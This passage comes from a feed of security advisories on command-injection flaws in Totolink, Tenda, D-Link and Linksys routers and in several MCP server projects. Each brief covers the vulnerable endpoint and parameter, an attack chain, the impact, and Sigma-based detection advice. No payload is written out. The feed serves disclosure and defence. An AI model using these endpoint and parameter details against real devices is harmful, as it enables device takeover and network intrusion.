CVE-2026-7241.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:17:41Z","date_published":"2026-04-28T09:17:41Z","id":"/briefs/2026-04-totolink-rce/","summary":"Totolink A8000RU version 7.1cu.643_b20200521 is vulnerable to OS command injection via manipulation of the `wifiOff` argument in the `setWiFiBasicCfg` function of the `/cgi-bin/cstecgi.cgi` CGI handler, allowing a remote attacker to execute arbitrary commands on the system.","title":"Totolink A8000RU OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7244"}],"_cs_exploited":false,"_cs_products":["A8000RU"],"_cs_severities":["critical"],"_cs_tags":["command injection","router vulnerability","cve-2026-7244"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical security vulnerability, identified as CVE-2026-7244, has been discovered in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI handler, specifically in the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003emerge\u003c/code\u003e argument, a remote attacker can inject and execute arbitrary operating system commands on the affected device. The vulnerability is remotely exploitable and a proof-of-concept exploit has been publicly released, increasing the risk of widespread exploitation. This poses a significant threat as it allows for complete control over the device, potentially leading to data breaches, network compromise, and botnet recruitment.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a malicious HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint on the Totolink A8000RU router.\u003c/li\u003e\n\u003cli\u003eThe request targets the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts the request to include a payload in the \u003ccode\u003emerge\u003c/code\u003e argument designed to inject an OS command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecstecgi.cgi\u003c/code\u003e script processes the request and passes the \u003ccode\u003emerge\u003c/code\u003e argument to a system call without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router\u0026rsquo;s operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then install malware, change router settings, or use the router as a pivot point to attack other devices on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7244 grants an attacker complete control over the vulnerable Totolink A8000RU router. This can lead to a variety of malicious activities, including data exfiltration, denial-of-service attacks, and the installation of persistent backdoors. Given the availability of a public exploit, a large number of devices could be compromised quickly. This could result in widespread botnet infections, impacting home users and small businesses relying on these routers for network connectivity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with suspicious parameters in the query string, especially related to the \u003ccode\u003emerge\u003c/code\u003e argument to detect exploitation attempts (see rule: \u0026ldquo;Detect Totolink A8000RU Command Injection Attempt\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to identify malicious payloads being sent to the affected endpoint (see rule: \u0026ldquo;Detect Totolink A8000RU Command Injection - Network\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u0026ldquo;Detect Totolink A8000RU Command Injection in Logs\u0026rdquo; to your SIEM to identify successful command injection attempts based on web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor for unusual process execution originating from the web server process, indicating potential exploitation.\u003c/li\u003e\n\u003cli\u003eUnfortunately, a patch is not available so consider migrating to a more secure router.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T09:16:17Z","date_published":"2026-04-28T09:16:17Z","id":"/briefs/2026-04-totolink-command-injection/","summary":"A critical OS command injection vulnerability (CVE-2026-7244) exists in the setWiFiEasyGuestCfg function of the /cgi-bin/cstecgi.cgi file in Totolink A8000RU version 7.1cu.643_b20200521, allowing remote attackers to execute arbitrary commands.","title":"Totolink A8000RU Command Injection Vulnerability (CVE-2026-7244)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7240"}],"_cs_exploited":false,"_cs_products":["A8000RU 7.1cu.643_b20200521"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7240","command-injection","totolink","router","cgi"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7240, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This flaw resides within the CGI Handler component, specifically in the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By exploiting this vulnerability, a remote attacker can inject arbitrary operating system commands by manipulating the \u003ccode\u003eUser\u003c/code\u003e argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. This vulnerability poses a significant threat as it allows complete control of the affected device, potentially leading to network compromise and data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521 accessible via the web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003esetVpnAccountCfg\u003c/code\u003e function call with a payload injected into the \u003ccode\u003eUser\u003c/code\u003e argument. The payload contains OS commands to be executed on the router.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s CGI Handler processes the request without proper sanitization of the \u003ccode\u003eUser\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the router.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised router to pivot within the network, potentially accessing sensitive data or other internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker could modify the router\u0026rsquo;s configuration, intercept network traffic, or use it as a launching point for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7240 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This could lead to a complete compromise of the device, potentially exposing sensitive information, enabling unauthorized network access, and facilitating further attacks within the network. Given the ease of exploitation and the availability of public exploits, organizations using this router model are at high risk of experiencing significant security breaches.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Command Injection Attempt\u003c/code\u003e to identify exploitation attempts against vulnerable Totolink routers. Enable webserver logging to capture the necessary request data.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Malicious User Agent\u003c/code\u003e to detect potential exploit attempts based on modified User-Agent headers.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command sequences in the \u003ccode\u003ecs-uri-query\u003c/code\u003e field, indicative of command injection attempts.\u003c/li\u003e\n\u003cli\u003eGiven the public availability of exploit code, organizations using the Totolink A8000RU 7.1cu.643_b20200521 are advised to replace the device if a patch is not available from the vendor.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T08:16:02Z","date_published":"2026-04-28T08:16:02Z","id":"/briefs/2026-04-totolink-cmd-injection/","summary":"CVE-2026-7240 is a critical OS command injection vulnerability in the Totolink A8000RU router that allows remote attackers to execute arbitrary commands by manipulating the 'User' argument in the 'setVpnAccountCfg' function.","title":"Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7240)","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7211"}],"_cs_exploited":true,"_cs_products":["MCP"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","git-search-api"],"_cs_type":"threat","_cs_vendors":["dvladimirov"],"content_html":"\u003cp\u003eA command injection vulnerability has been identified in dvladimirov MCP (Monitoring and Configuration Platform) up to version 0.1.0. This vulnerability resides within the GitSearchRequest function located in the \u003ccode\u003emcp_server.py\u003c/code\u003e file, specifically affecting the Git Search API component. Successful exploitation allows a remote attacker to inject and execute arbitrary commands on the underlying system. The vulnerability stems from insufficient sanitization of user-supplied input to the \u003ccode\u003erepo_url\u003c/code\u003e or \u003ccode\u003epattern\u003c/code\u003e arguments. Publicly available exploits exist, increasing the risk of active exploitation. The project maintainers were notified through an issue report but have not yet addressed the vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies an instance of dvladimirov MCP running a version up to 0.1.0 with the Git Search API enabled.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the Git Search API endpoint (\u003ccode\u003e/gitsearch\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWithin the request, the attacker injects a command injection payload into either the \u003ccode\u003erepo_url\u003c/code\u003e or \u003ccode\u003epattern\u003c/code\u003e argument. This payload leverages shell metacharacters (e.g., \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u0026amp;\u003c/code\u003e) to chain malicious commands.\u003c/li\u003e\n\u003cli\u003eThe MCP server receives the request and passes the unsanitized \u003ccode\u003erepo_url\u003c/code\u003e or \u003ccode\u003epattern\u003c/code\u003e value to the GitSearchRequest function in \u003ccode\u003emcp_server.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eGitSearchRequest\u003c/code\u003e function executes the injected command via a system call, effectively bypassing intended functionality.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary command execution on the server, potentially allowing them to read sensitive files, modify system configurations, or establish a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the reverse shell to further explore the network and escalate privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this command injection vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, modification, or destruction. Given the nature of MCP, which likely manages configurations and monitors other systems, a successful attack could cascade to other parts of the infrastructure, potentially affecting numerous systems across the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply input validation and sanitization to the \u003ccode\u003erepo_url\u003c/code\u003e and \u003ccode\u003epattern\u003c/code\u003e parameters within the \u003ccode\u003eGitSearchRequest\u003c/code\u003e function to prevent command injection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect MCP Git Search API Command Injection Attempt\u003c/code\u003e to detect exploitation attempts targeting CVE-2026-7211.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests containing shell metacharacters in the \u003ccode\u003erepo_url\u003c/code\u003e or \u003ccode\u003epattern\u003c/code\u003e parameters as outlined in the Sigma rule and overview sections.\u003c/li\u003e\n\u003cli\u003eConsider isolating or taking offline affected MCP instances until a patch is available to mitigate the risks associated with CVE-2026-7211.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T01:16:02Z","date_published":"2026-04-28T01:16:02Z","id":"/briefs/2026-04-mcp-command-injection/","summary":"A command injection vulnerability (CVE-2026-7211) exists in the GitSearchRequest function of dvladimirov MCP up to version 0.1.0, allowing a remote attacker to execute arbitrary commands by manipulating the repo_url or pattern argument.","title":"dvladimirov MCP Git Search API Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-mcp-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7160"}],"_cs_exploited":false,"_cs_products":["HG3 2.0"],"_cs_severities":["critical"],"_cs_tags":["command-injection","cve-2026-7160","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eTenda HG3 2.0 is vulnerable to a command injection vulnerability (CVE-2026-7160) affecting the formTracert function in the /boaform/formTracert file. A remote attacker can exploit this by manipulating the datasize argument to inject arbitrary commands into the system. The vulnerability has a CVSS v3.1 score of 8.8, indicating a high severity. Public disclosure and potential exploitation make this a critical issue for users of the Tenda HG3 2.0 router. Successful exploitation allows an attacker to execute arbitrary commands on the device, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda HG3 2.0 router with an exposed web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the /boaform/formTracert endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a manipulated datasize argument designed to inject a command.\u003c/li\u003e\n\u003cli\u003eThe web server processes the request and passes the manipulated datasize argument to the formTracert function.\u003c/li\u003e\n\u003cli\u003eThe formTracert function fails to properly sanitize the input, allowing the injected command to be executed by the system.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary commands on the Tenda HG3 2.0 router. This can lead to complete compromise of the device, including modification of router settings, interception of network traffic, and potential use of the router as a botnet node. Given the high base score of 8.8, this poses a significant risk to affected users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Tenda to address CVE-2026-7160.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/boaform/formTracert\u003c/code\u003e with unusual \u003ccode\u003edatasize\u003c/code\u003e parameters, as covered by the Sigma rule \u0026ldquo;Detect Tenda HG3 Command Injection Attempt\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect and block exploit attempts targeting this vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T22:16:18Z","date_published":"2026-04-27T22:16:18Z","id":"/briefs/2026-04-tenda-hg3-command-injection/","summary":"Tenda HG3 2.0 is vulnerable to command injection; by manipulating the datasize argument in the formTracert function of the /boaform/formTracert file, a remote attacker can inject commands.","title":"Tenda HG3 2.0 Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-hg3-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-7039"}],"_cs_exploited":false,"_cs_products":["ssh-mcp"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","ssh-mcp"],"_cs_type":"advisory","_cs_vendors":["tufantunc"],"content_html":"\u003cp\u003eA command injection vulnerability, tracked as CVE-2026-7039, affects tufantunc ssh-mcp versions up to 1.5.0. The vulnerability resides in the \u003ccode\u003eshell.write\u003c/code\u003e function within the \u003ccode\u003esrc/index.ts\u003c/code\u003e file. By manipulating the \u003ccode\u003eDescription\u003c/code\u003e argument, a local attacker can inject arbitrary commands. Publicly disclosed exploits exist, increasing the risk of exploitation. The project maintainers have been notified but have not yet responded. This vulnerability poses a significant risk to systems where ssh-mcp is installed, potentially allowing attackers to execute commands with the privileges of the application.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains local access to a system with tufantunc ssh-mcp installed.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies the vulnerable \u003ccode\u003eshell.write\u003c/code\u003e function in \u003ccode\u003esrc/index.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious input containing shell commands embedded within the \u003ccode\u003eDescription\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a function that calls \u003ccode\u003eshell.write\u003c/code\u003e with the crafted input.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eshell.write\u003c/code\u003e function processes the malicious input without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected shell commands are executed by the system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the system or its data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7039 allows a local attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, modification, or destruction. Given the publicly available exploit, organizations using vulnerable versions of tufantunc ssh-mcp are at significant risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available patches or updates for tufantunc ssh-mcp to remediate CVE-2026-7039.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for suspicious commands originating from the ssh-mcp application, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization within the \u003ccode\u003eshell.write\u003c/code\u003e function to prevent command injection.\u003c/li\u003e\n\u003cli\u003eReview and restrict local access privileges on systems running ssh-mcp to minimize the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T12:00:00Z","date_published":"2026-04-27T12:00:00Z","id":"/briefs/2026-04-ssh-mcp-command-injection/","summary":"A command injection vulnerability exists in tufantunc ssh-mcp up to version 1.5.0 via manipulation of the Description argument in the shell.write function.","title":"tufantunc ssh-mcp Command Injection Vulnerability (CVE-2026-7039)","url":"https://feed.craftedsignal.io/briefs/2026-04-ssh-mcp-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7067"}],"_cs_exploited":false,"_cs_products":["DIR-822 A_101"],"_cs_severities":["high"],"_cs_tags":["command-injection","dhcp","iot"],"_cs_type":"advisory","_cs_vendors":["D-Link"],"content_html":"\u003cp\u003eA command injection vulnerability, tracked as CVE-2026-7067, has been identified in D-Link DIR-822 hardware with firmware version A_101. The vulnerability lies within the udhcpd DHCP service, specifically in the handling of the Hostname argument in the /udhcpcd/dhcpd.c file. A remote attacker can exploit this flaw by injecting arbitrary commands through a crafted Hostname field in a DHCP request. While a proof-of-concept exploit is publicly available, this vulnerability is less impactful because the D-Link DIR-822 A_101 is no longer supported by the vendor, potentially limiting the number of affected devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-822 A_101 device.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious DHCP request containing a command injection payload in the Hostname field.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted DHCP request to the vulnerable device.\u003c/li\u003e\n\u003cli\u003eThe udhcpd service parses the DHCP request and extracts the Hostname.\u003c/li\u003e\n\u003cli\u003eDue to insufficient input validation, the injected command within the Hostname is passed to the \u003ccode\u003esystem\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esystem\u003c/code\u003e function executes the injected command with the privileges of the udhcpd process (typically root).\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary code execution on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as gaining persistent access, modifying device configuration, or using the device as part of a botnet.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this command injection vulnerability allows a remote, unauthenticated attacker to execute arbitrary code on the affected D-Link DIR-822 A_101 device. Given the end-of-life status of the product, patching is unlikely, leaving devices vulnerable. An attacker could leverage this vulnerability to gain complete control of the router, potentially compromising networks connected to it. The specific number of vulnerable devices is unknown, but the impact could be significant if many devices remain in use.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule to detect command injection attempts via DHCP Hostname (Sigma rule: \u003ccode\u003eDHCP Hostname Command Injection\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious DHCP requests containing unusual characters or command sequences in the Hostname field, using network monitoring tools.\u003c/li\u003e\n\u003cli\u003eConsider network segmentation to isolate potentially vulnerable D-Link DIR-822 A_101 devices from critical network resources.\u003c/li\u003e\n\u003cli\u003eIf replacement is not immediately feasible, implement strict access control lists on the firewall to limit access to the D-Link DIR-822 A_101 device\u0026rsquo;s management interface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-27T00:20:13Z","date_published":"2026-04-27T00:20:13Z","id":"/briefs/2026-04-dlink-dir822-cmd-injection/","summary":"A command injection vulnerability exists in D-Link DIR-822 A_101, specifically within the udhcpd DHCP service; by manipulating the Hostname argument, a remote attacker can inject commands, but the affected product is no longer supported.","title":"D-Link DIR-822 A_101 Command Injection via DHCP Hostname","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-dir822-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7061"}],"_cs_exploited":false,"_cs_products":["chatgpt-mcp-server"],"_cs_severities":["high"],"_cs_tags":["cve-2026-7061","command-injection","webserver"],"_cs_type":"advisory","_cs_vendors":["Toowiredd"],"content_html":"\u003cp\u003eToowiredd chatgpt-mcp-server, specifically versions up to 0.1.0, contains an OS command injection vulnerability within the \u003ccode\u003esrc/services/docker.service.ts\u003c/code\u003e file of the MCP/HTTP component. This flaw allows for remote exploitation, potentially enabling attackers to execute arbitrary commands on the underlying operating system. The vulnerability, identified as CVE-2026-7061, has a publicly available exploit, increasing the risk of exploitation. The project maintainers were notified via an issue report but have not yet addressed the vulnerability, making it crucial for defenders to implement mitigation and detection measures. This poses a significant risk to systems running vulnerable versions of chatgpt-mcp-server, as successful exploitation could lead to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of Toowiredd chatgpt-mcp-server running version 0.1.0 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the MCP/HTTP component.\u003c/li\u003e\n\u003cli\u003eThe request exploits the command injection vulnerability in \u003ccode\u003esrc/services/docker.service.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe server-side code improperly sanitizes input, allowing the attacker to inject OS commands.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the server with the privileges of the chatgpt-mcp-server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the system.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial access to escalate privileges or move laterally within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration, deploying malware, or disrupting services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this OS command injection vulnerability (CVE-2026-7061) in Toowiredd chatgpt-mcp-server can lead to complete system compromise. Attackers can execute arbitrary commands, potentially leading to data breaches, service disruption, or the deployment of malicious software. Given the public availability of the exploit, organizations using this software are at a heightened risk of attack. The lack of a patch from the project maintainers further exacerbates the risk, making proactive detection and mitigation measures essential.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious HTTP requests targeting the MCP/HTTP component of chatgpt-mcp-server, focusing on requests that might be attempting command injection (log source: webserver, product: linux).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious chatgpt-mcp-server Command Injection Attempts\u0026rdquo; to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eRestrict access to the chatgpt-mcp-server instance to minimize the attack surface.\u003c/li\u003e\n\u003cli\u003eConsider deploying a web application firewall (WAF) to filter out malicious requests.\u003c/li\u003e\n\u003cli\u003eMonitor child processes spawned by the chatgpt-mcp-server process for unexpected or malicious commands (log source: process_creation, product: linux).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T22:17:33Z","date_published":"2026-04-26T22:17:33Z","id":"/briefs/2026-04-chatgpt-mcp-server-cmd-injection/","summary":"Toowiredd chatgpt-mcp-server up to version 0.1.0 is vulnerable to OS command injection via the file src/services/docker.service.ts of the component MCP/HTTP, allowing for remote exploitation.","title":"Toowiredd chatgpt-mcp-server OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-chatgpt-mcp-server-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6992"}],"_cs_exploited":false,"_cs_products":["MR9600 (2.0.6.206937)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6992","command-injection","router","rce"],"_cs_type":"advisory","_cs_vendors":["Linksys"],"content_html":"\u003cp\u003eA command injection vulnerability, CVE-2026-6992, affects the Linksys MR9600 router, specifically version 2.0.6.206937. The vulnerability resides in the JNAP Action Handler component within the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script. Attackers can remotely exploit this flaw by manipulating the \u003ccode\u003epin\u003c/code\u003e argument passed to the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function. This allows for the execution of arbitrary operating system commands on the affected device. A public exploit is available, increasing the risk of exploitation. The vendor was notified but did not respond.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the Linksys MR9600 router.\u003c/li\u003e\n\u003cli\u003eThe request targets the JNAP Action Handler component, specifically the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function is invoked by the crafted request.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious OS commands within the \u003ccode\u003epin\u003c/code\u003e argument of the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s firmware processes the request, failing to properly sanitize the \u003ccode\u003epin\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the running process, potentially \u003ccode\u003eroot\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the router, potentially allowing for further malicious activities, such as network traffic interception or modification of router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6992 allows a remote attacker to execute arbitrary commands on the Linksys MR9600 router. This can lead to a complete compromise of the device, allowing the attacker to monitor network traffic, change router configurations, or use the router as a foothold for further attacks within the network. Given the availability of a public exploit, the risk of widespread exploitation is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect CVE-2026-6992 Exploitation Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Suspicious Shell Activity via Web Request\u003c/code\u003e to detect potential command injection attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests containing suspicious characters in the \u003ccode\u003ecs-uri-query\u003c/code\u003e field that target \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e to uncover exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T12:00:00Z","date_published":"2026-04-26T12:00:00Z","id":"/briefs/2026-04-linksys-rce/","summary":"CVE-2026-6992 is a command injection vulnerability in the Linksys MR9600 router that allows remote attackers to execute arbitrary OS commands by manipulating the 'pin' argument in the BTRequestGetSmartConnectStatus function.","title":"Linksys MR9600 Command Injection Vulnerability (CVE-2026-6992)","url":"https://feed.craftedsignal.io/briefs/2026-04-linksys-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-6987"}],"_cs_exploited":false,"_cs_products":["PicoClaw"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","web-application"],"_cs_type":"advisory","_cs_vendors":["sipeed"],"content_html":"\u003cp\u003eA command injection vulnerability exists in PicoClaw version 0.2.4, specifically affecting the \u003ccode\u003e/api/gateway/restart\u003c/code\u003e endpoint within the Web Launcher Management Plane component. This flaw allows unauthenticated remote attackers to inject and execute arbitrary commands on the underlying system. The vulnerability, identified as CVE-2026-6987, stems from improper 